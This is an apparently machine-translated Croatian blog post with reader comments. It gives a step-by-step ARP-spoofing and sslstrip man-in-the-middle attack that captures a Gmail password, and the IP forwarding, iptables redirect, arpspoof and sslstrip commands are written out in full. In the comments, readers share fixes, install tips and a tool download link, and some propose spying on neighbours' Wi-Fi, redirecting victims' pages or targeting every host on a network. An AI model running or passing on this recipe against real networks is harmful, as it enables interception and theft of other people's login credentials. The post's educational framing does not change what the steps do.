Pozdrav blogeri.
Za danas imam mali uzorak koliko opasno može biti povezivanje u bilo koju mrežu bez sigurnosti onih koji se toliko nama sviđaju.
Za danas ću koristiti ArpSpoofing sa Sslstripom kako bih dobio lozinku za Gmail. Kako bih okoliš učinio kontroliranijim, stvorio sam račun pod nazivom "testarp@gmail.com".
A budući da mi se preambule ne sviđaju previše, prijeđimo na posao.
OKOLIŠ
Za ovaj test imamo sljedeće:
1. Napadač: Moje stolno ili stolno računalo ima Debian Wheezy. Iz spremišta možete instalirati sslstrip y dsniff stići imati harpsoofing
2. Žrtva: Žrtva je Android tablet koji svoju poštu želi vidjeti samo putem preglednika.
3. Medij: Sredina je moja Usmjerivač Cisco DPC2425
ADRESE.
Adresa napadača: 172.26.0.2
Adresa usmjerivača: 172.26.0.1
Adresa žrtve: 172.26.0.8
NAPAD:
Prvo što ćemo učiniti za ovaj napad je aktiviranje prosljeđivanja kako bi naše računalo moglo proslijediti informacije žrtvi, a da ona to ne shvati. (Inače bi to bio napad uskraćivanja usluga)
Za to ćemo koristiti:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Sada ako napravimo rep -f desdelinux informacije vidimo uživo i izravno
Pa kako onda dobiti ono što želimo?
Prvo unesite svoju poštu na Tablet. Tijekom prijave vidimo da se na našoj konzoli pojavljuju tisuće i tisuće stvari.
Sada kada je gotovo, otvorimo našu datoteku “desdelinux” s nano
nano desdelinux
s Control + W tražimo nešto što se zove SECURE POST.
I vidjet ćemo ovako nešto.
Među tom ogromnom linijom koja se ne može vidjeti je žrtvina e-pošta i lozinka.
Pa trčimo udesno dok napokon ne ugledamo svjetlost na kraju tunela.
Drugom ćemo prigodom vidjeti kako se možemo malo zaštititi od ovih napada.
pozdravi
Koristim priliku i kažem da kad je objava objave naredbe nisu bile ispravne.
Naredbi iptables na kraju nedostaje 8080 koji je na drugoj liniji. A tada su naredbe arpspoof bile na istoj liniji. Svaka naredba nalazi se na drugoj liniji.
Nadam se da ga urednik vidi i može popraviti.
Pozdrav.
Uradio sam ispravke koje spominjete, je li to u redu?
Ako ćete umetnuti kôd u željeni unos, upotrijebite HTML prikaz i provjerite je li članak točan prije slanja na čekanje. Hvala vam.
Hladno je znati da smo oni koji nemamo znanje toliko ranjivi. Vrlo dobre informacije čak i kad malo razumijem temu, shvaćam važnost. Hvala vam!
pozdravi
Ali to djeluje samo ako su napadač i žrtva na istoj mreži. U svakom slučaju, čini mi se da ako se (ako ste u istoj mreži) povežete pomoću HTTPS-a, to se ne događa jer su podaci šifrirani PRIJE napuštanja stroja. Ako se povežete putem HTTP-a (bez S), mislim da čak i gledajući mrežni kabel vidite ključeve.
To nije istina. Hakiram gmail lozinku i ako primijetite da gmail koristi https. Tako? Poanta je u tome što, iako je https siguran, ovisi o http-u. Dakle, nije tako sigurno.
Ne priznajte toliko o https-u da S nije za Supermana, koliko da je "siguran"
radi sa ili bez https-a, probao sam ga sa specijaliziranijim linux distribucijskim sustavom i djeluje bez problema
Možete ga precizno koristiti za podučavanje onih koji ukradu vaš Wi-Fi. 😀
Otprilike je poput onoga što su davno rekli na blogu Cheme Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, sjajno što radi! / I onda kažu mojem paranoiku svaki put kad koristim VPN kad odu provjeriti bankovni račun ...). Usput u komentarima morate vidjeti koliko su ljudi cinični ... ako na kraju kradu ...
Sada moramo uzeti vodič o tome kako stvoriti i ponuditi vlastitu VPN uslugu.
Priča koju povezujete vrlo je zanimljiva, čak se čini vrijednom nove knjige, i ovo me podsjeća na to kada sam koristio internet svojih susjeda i iako kažem da znam tu temu, mislim da nikada ne bih mogao vidjeti prave dimenzije opasnosti koju bih mogao imati zadnji, na moju sreću, promijenili su samo lozinku u WPA2 i tu je započela moja priča s ISP-om haha
Zato naslov kaže Sslstrip na djelu.
Djeluje, sve dok je napadač u sredini
Koji val radite na prizmi? -.-
nema.
Što čekate da pošaljete svoj zahtjev XD
pozdravi
dobar post
Zanimljivo, kasnije ću napraviti edukativni test ... Možda bih mogao i ukloniti lozinku za WiFi i malo se zabaviti 😛
Bilo kojim slučajem, možete li učiniti nešto slično za slanje različitih stranica na one koje je cilj tražio? Na primjer, oni žele otvoriti Facebook, a ja ih preusmjerim na Google? 😛
Da. Ali sve je to sasvim drugačija rola.
Možda ću ga objaviti kasnije.
vrlo dobar post, ove su teme vrlo edukativne, sada moramo biti u stanju suzbiti ovaj napad, jer bi se neki (poput mene) povezali s javnim mrežama (na primjer sveučilište), bilo bi korisno to izbjeći.
Pozdrav!
Nije mi uspjelo 🙁
Nešto mi ovdje ne uspijeva, osim činjenice da su https veze šifrirane putem certifikata poslužitelja (kada certifikat imate na svojem računalu, vaš je preglednik zadužen za šifriranje) pomoću iptables preusmjeravate port 80 (http), a ne 443 što je https
I ja sam to mislio. Poanta je u tome što, iako je https "siguran", nažalost ovisi o http-u. Dakle, sslstrip to koristi, što čini da preglednik vjeruje da koristi https vjerodajnice, ali nije.
sveto sranje! ali preglednik bi trebao vidjeti upozorenje poput "ovaj certifikat dolazi sa sumnjive web lokacije ili slično tome" ... Svakako ću morati obaviti testove XD
Ne, apsolutno ništa ne izlazi.
Napokon mi je uspjelo
Na WEP mrežu povezan sam lozinkom, a lozinka mi je ionako pokazala izravno.
Upit. Možete li napraviti isti postupak, ali za sva računala koja su povezana u mrežu, umjesto da imate samo jednu žrtvu?
Da, možeš. Ali nisam radio eksperimente. Isprobajte sami i recite nam kako ste.
Jedino što s tim shvatim je da se žrtvin stroj isključi, ali sslstrip mi ne pokazuje ništa: /
Trebali biste na trenutak onemogućiti vatrozid. Ili barem omogućiti dolazne veze.
Probe i ja smo mogli vidjeti samo korisničko ime i lozinku facebook stranice, u gmailu nisam pronašao nikakav rezultat u zapisniku, također mi je trebao samo redak arpspoof «arpspoof -i -t«. S druge strane, stroj za žrtve nije mogao otvoriti neke stranice. Nastavit ću s istragom, vrlo je zanimljivo. Pomoć onima koji koriste Manjaro, paketi za instalaciju su: dsniff (ovdje je arpspoff), twisted i python2-pyopenssl. Sslstrip možete preuzeti ovdje: http://www.thoughtcrime.org/software/sslstrip/
Da biste ga pokrenuli $ python2 sslstrip.py
Pozdrav.
Nije izašao, ali arpspoof linija je: #arpspoof -i int -t ip-žrtva ip-usmjerivač
gledaj, radim točno ono što kažeš:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PRERUTIRANJE -p tcp –odredišni port 80 -j REDIRECT –to-ports 8080
arppoof -i eth0 -t 172.26.0.8 172.26.0.1
arppoof -i eth0 -t 172.26.0.1 172.26.0.2
problem je u tome što žrtva koja je još jedno računalo koje imam ovdje u svojoj sobi nemam veze s tim da moram ponovno pokrenuti usmjerivač, što mi može pomoći.
Još jedna stvar je što radim s virtualnim strojem, a kada izvršim naredbu iwconfig, wlan0 se ne pojavljuje, niti kada izvršavam ifconfig, međutim ako na svom virtualnom stroju imam internet, što s eth0 sučeljem.